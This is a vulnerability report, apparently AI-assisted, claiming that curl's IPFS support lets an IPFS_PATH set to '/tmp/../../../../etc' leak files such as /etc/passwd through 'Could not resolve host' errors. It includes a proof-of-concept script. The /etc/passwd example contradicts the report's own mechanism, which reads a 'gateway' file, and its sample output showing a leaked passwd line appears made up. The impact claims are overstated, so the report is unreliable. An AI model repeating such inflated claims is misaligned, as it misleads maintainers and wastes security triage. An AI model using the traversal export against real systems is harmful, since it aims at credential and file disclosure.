Path Traversal Vulnerability in curl via Unsanitized IPFS_PATH Environment Variable

A path traversal vulnerability exists in curl versions with IPFS support (7.81.0+). The IPFS_PATH environment variable is not properly sanitized, allowing attackers to read arbitrary files by manipulating directory traversal sequences (e.g., ../../../../etc). This flaw enables leakage of sensitive data (e.g., SSH keys, credentials, system files) via DNS/HTTP error messages. ## Type of AI used: Deepseek R1 (in some search and steps to reproduce and clear description of vuln ) ## Affected version: curl 8.13.0 (and all 7.81.0+ releases with IPFS support) ## curl --version: (x86_64-pc-linux-gnu) libcurl/8.13.0 GnuTLS/3.8.6 zlib/1.3.1 brotli/1.1.0 zstd/1.5.6 libidn2/2.3.7 libpsl/0.21.2 libssh2/1.11.1 nghttp2/1.62.1 ngtcp2/1.6.0 nghttp3/1.4.0 librtmp/2.3 OpenLDAP/2.6.9 Release-Date: 2025-04-02, security patched: 8.13.0-1 Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns ldap ldaps mqtt pop3 pop3s rtmp rtsp scp sftp smb smbs smtp smtps telnet tftp ws wss Features: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTP3 HTTPS-proxy IPv6 Kerberos Largefile libz NTLM PSL SPNEGO SSL threadsafe TLS-SRP UnixSockets zstd ## System: Kali GNU/Linux Rolling ## Applicable to: 1.CI/CD pipelines (leak build secrets). 2.Containers (escape to read host files). 3.Shared hosting environments. ## Steps To Reproduce (simple way): 1. make data-fetcher.sh 2. add this to data-fetcher.sh ``` #!/bin/bash # 1. Create test file with unique URL-like content TEST_CONTENT="http://LEAKED_DATA_$(date +%s).invalid" echo "$TEST_CONTENT" > /tmp/test_file.txt # 2. Setup exploit EXPLOIT_DIR=$(mktemp -d) ln -sf /tmp/test_file.txt "$EXPLOIT_DIR/gateway" export IPFS_PATH="$EXPLOIT_DIR" # 3. Trigger the vulnerability echo "[+] Testing exploit - should leak: $TEST_CONTENT" curl -v ipfs://dummycid 2>&1 | grep -A1 "Could not resolve host" # 4. Cleanup unset IPFS_PATH rm -rf "$EXPLOIT_DIR" /tmp/test_file.txt ``` 3. run ``` chmod +x data-fetcher.sh ./data-fetcher.sh ``` output: ``` [+] Testing exploit - should leak: http://LEAKED_DATA_1744992527.invalid 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Could not resolve host: LEAKED_DATA_1744992527.invalid shutting down connection #0 curl: (6) Could not resolve host: LEAKED_DATA_1744992527.invalid ``` ## Simple Example: Scenario: Document Viewer App App Purpose: Lets users view files stored on IPFS (e.g., ipfs://QmPDF). How It Works: ``` # App uses curl to fetch files curl --ipfs-gateway https://trusted-gateway.com ipfs://QmPDF ``` Attack (No App Compromise) Attacker Action: Sets a malicious path: ``` export IPFS_PATH="/tmp/../../../../etc" # Traverse to /etc (No hacking required! Just setting an environment variable.) ``` User Action: Uses the app normally (e.g., clicks "View PDF"). Result: curl reads /etc/passwd instead of the PDF. File contents leak via errors: ``` curl: (6) Could not resolve host: root:x:0:0:root:/root:/bin/bash ``` Key Clarifications App is Not at Fault: Uses curl correctly. No code flaws or misconfigurations. Attacker Needs Only: Access to set environment variables (e.g., in shared hosting, CI/CD). No app/backend hacking required. User is Innocent: Just uses the app normally. Real-World Analogy Imagine a delivery app (curl) that blindly trusts addresses provided by outsiders (IPFS_PATH). Attacker: Tricks the app into delivering a package to /etc/passwd instead of the user’s home. Result: The app leaks sensitive mail (files) it shouldn’t access. ## Mitigation: 1.Sanitize IPFS_PATH: 2.Use realpath() to resolve absolute paths. 3.Block directory traversal sequences (..). 4.Disable IPFS by Default: Enable only in trusted environments. ## CVSS:3.1: /AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N (High) ## Supporting Material/References: {F4265018} {F4265019} {F4265020} {F4265023} ## Impact Theft of credentials, SSH keys, and system files.